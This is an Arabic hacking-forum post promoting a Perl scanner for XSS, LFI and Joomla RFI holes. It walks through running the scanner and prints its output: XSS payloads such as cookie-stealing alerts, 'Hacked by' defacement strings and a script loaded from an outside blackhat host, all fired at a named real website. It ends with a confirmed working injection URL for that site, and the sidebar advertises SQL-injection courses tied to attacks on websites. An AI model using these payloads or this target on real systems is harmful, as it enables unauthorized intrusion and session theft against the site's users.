1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ سكربت ] بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

الموضوع في 'قسم الأدوات' بواسطة IraQ-HacKer, بتاريخ ‏5 يونيو 2014.

كاتب الموضوع : IraQ-HacKer المشاهدات : 472 الردود : 1 ‏5 يونيو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    IraQ-HacKer
    Developer

    عضو منذ:
    ‏20 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    21
    نقاط الجائزة:

    [​IMG]

    السلام عليكم ورحمة الله تعالي وبركاتة

    سكربت بيرل للبحث عن ثغرات

    XSS , LFI , Joomla RFI

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    [ شرح مبسط ]

    ناخذ اكواد السكربت ونفتح تكست ونلصق الاكواد فيه ونحفضه ب صيغه pl
    مثال p.pl
    ونحفضه ف اي مكان ، عن نفسي حفضته في القرص C

    [​IMG]

    [ 1 ] هو الثغرات المراد البحث عنهاَ
    [ 2 ] نضع رقم الثغره ك مثال انا اخترت رقم 1 الي هي XSS
    [ 3 ] نضع الموقع المراد فحصه بدون القيمه او ب القيمه لا مانع
    ثم انتر

    [​IMG]

    [ 4 ] وبعد انتهاء الفحص ، نحفظه ب صيغه txt
    ومرات ينحفظ تلقائياََ
    لكن لمن تواجهه مشكله في حفظ عمله البحث
    يعمل ك التالي
    كمثال في الصوره الثانيه : انا حفظته xxs2.txt

    C:/>xss2.txt
    المسار الي حفظنا فيه
    اسم المستند
    الصيغه

    ثم نتجه ل القرص C
    ينجد المستند ب اسم xss2
    او ب اسم All

    نفتح المستند

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58='><script>alert(document.cookie)</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58&lt;script&gt;alert('Hacked by TheShow youtube.com/theshowinglok');&lt;/script&gt   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58a?<script>alert('Hacked by TheShow youtube.com/theshowinglok')</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/Hacked by TheShow youtube.com/theshowinglok/alert(a.source)</SCRIPT>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58%3Cscript%3Ealert('Hacked by TheShow')%3C/script%3E   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert('Hacked by TheShow')>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/G3n3Rall/alert(a.source)</SCRIPT>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT SRC=http://g3n3rall-blackhat.persiangig.com/XSS.JS?<B>   =>   NOT FOUND XSS Vulnerability
    بعد ما نفتح المستند بنجد كلمتين في كل سطر

    XSS Vulnerability FOUND
    تم العثور على ثغره امنيه XSS

    NOT FOUND XSS Vulnerability
    لم يتم العثور على ثغرة أمنية XSS


    طيب ناخذ الرابط الي بعده كلمه XSS Vulnerability FOUND

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer> => XSS Vulnerability FOUND
    انصح ب استبدال
    <CeNTer>G3n3Rall</CeNTer>

    ب
    "<>'<script>alert(0)</script>

    ليصبح الرابط بهذا الشكل

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58"<>'<script>alert(0)</script>

    مصاب وظهر لنا رساله التنبيه 1

    وفقنا الله وياكم لما يحب ويرضى


    [​IMG]

    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    GosTeR DZ
    DeveloPer Plus

    عضو منذ:
    ‏5 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:



حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...